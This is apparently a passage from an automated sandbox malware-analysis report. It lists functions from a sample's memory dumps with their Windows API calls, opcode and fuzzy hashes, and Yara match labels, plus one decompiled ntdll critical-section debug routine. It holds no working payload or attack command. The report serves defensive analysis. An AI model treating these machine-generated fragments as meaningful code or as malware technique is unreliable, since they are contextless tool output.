                                                                          • Instruction ID: 88395ffaa21961f076f3fdf85811e9b2945d3629371e3b1e8a13738ee262a76c
                                                                          • Opcode Fuzzy Hash: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
                                                                          • Instruction Fuzzy Hash: 65E092733903143AE33065999C03FE7B79CCB81B25F54002AFB0DEB2C1D599F84142A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418622, Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFA2,0040CFA2,?,00000000,?,?), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 61d741f13c762c0c3d9c4dd0b5dd31100347617369d8ed4e751554871afb2031
                                                                          • Instruction ID: b492ee65ba8bc85551817de21ab0afc2df0ea4206b9bc69b9402acfe1ba14197
                                                                          • Opcode Fuzzy Hash: 61d741f13c762c0c3d9c4dd0b5dd31100347617369d8ed4e751554871afb2031
                                                                          • Instruction Fuzzy Hash: CEF0A0B2600214ABCB20DF94DC80EE77768EF45390F214569FA1C97241DA3199558BE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00000000,?), ref: 004184BD
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFA2,0040CFA2,?,00000000,?,?), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040D408, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00407C63,?), ref: 0040D43B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 277398dbf13f4179c9b7496eaa74525ad698b05b587a3650bbc836ed593caa28
                                                                          • Instruction ID: ced20648e43848aa154b271161ca3dc2f8a196833fde4e9e33a2169c003d577f
                                                                          • Opcode Fuzzy Hash: 277398dbf13f4179c9b7496eaa74525ad698b05b587a3650bbc836ed593caa28
                                                                          • Instruction Fuzzy Hash: 9AD05E76F503003EF610EEA49C06FA626895B64755F4A4079F94DE73C3DA28D9018568
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00407C63,?), ref: 0040D43B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction ID: 76295216a374bba8ccc5fc4b13cd7115f1d582a05cb993be163334a8e1d27b58
                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction Fuzzy Hash: B1D05E71B503043AE610AAA89C03F6632885B54B04F494064F949A63C3D964E5004565
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004185D6, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040CFA2,0040CFA2,?,00000000,?,?), ref: 00418660
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction ID: c1232d1a8e4e99d6700dad9e163c6271c5d2c8c15c6dedabe14bd1bef052e82d
                                                                          • Opcode Fuzzy Hash: 9f8115ff1769d31a6f7f52e36d999440d1c0a573dd99967d02bf22a94f21daa9
                                                                          • Instruction Fuzzy Hash: 15D0C9B5200518AF8B04EE4AD8908AB73A9AF882247258659FC0997301CA31ED268AB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0462967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4cf58cee9bb573d50f99746088a35b7b215f4f8374d7e9c2d498c0cc19a265ba
                                                                          • Instruction ID: bdbb17795a46d0cd9939e62a7e245f07e7aa3cdd5711e7ea8344e1e111d686dd
                                                                          • Opcode Fuzzy Hash: 4cf58cee9bb573d50f99746088a35b7b215f4f8374d7e9c2d498c0cc19a265ba
                                                                          • Instruction Fuzzy Hash: E0B02BF1A014C0C9F700DB600708717390077D0742F12C021D1020240A0338D094F5B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0467FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E0467FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0462CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04675720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04675720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x0467fdda
                                                                          0x0467fde2
                                                                          0x0467fde5
                                                                          0x0467fdec
                                                                          0x0467fdfa
                                                                          0x0467fdff
                                                                          0x0467fe0a
                                                                          0x0467fe0f
                                                                          0x0467fe17
                                                                          0x0467fe1e
                                                                          0x0467fe19
                                                                          0x0467fe19
                                                                          0x0467fe19
                                                                          0x0467fe20
                                                                          0x0467fe21
                                                                          0x0467fe22
                                                                          0x0467fe25
                                                                          0x0467fe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0467FDFA
                                                                          Strings
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0467FE01
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0467FE2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp, Offset: 045C0000, based on PE: true
                                                                          • Associated: 00000004.00000002.478615110.00000000046DB000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000004.00000002.478628676.00000000046DF000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 35c1f8f29e8fa21041fd530617396ec3fbb3ce64006d9ad73dd66e34ed774bc7
                                                                          • Instruction ID: 78a68e436549aca71619d2fa48da8703776d28076bc6875a26bd6ccbc6a358a8
                                                                          • Opcode Fuzzy Hash: 35c1f8f29e8fa21041fd530617396ec3fbb3ce64006d9ad73dd66e34ed774bc7
                                                                          • Instruction Fuzzy Hash: 2CF0F632200601BFE6245B55DC02F23BB6AEF44730F140358F628565E1FA62F860DAF9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%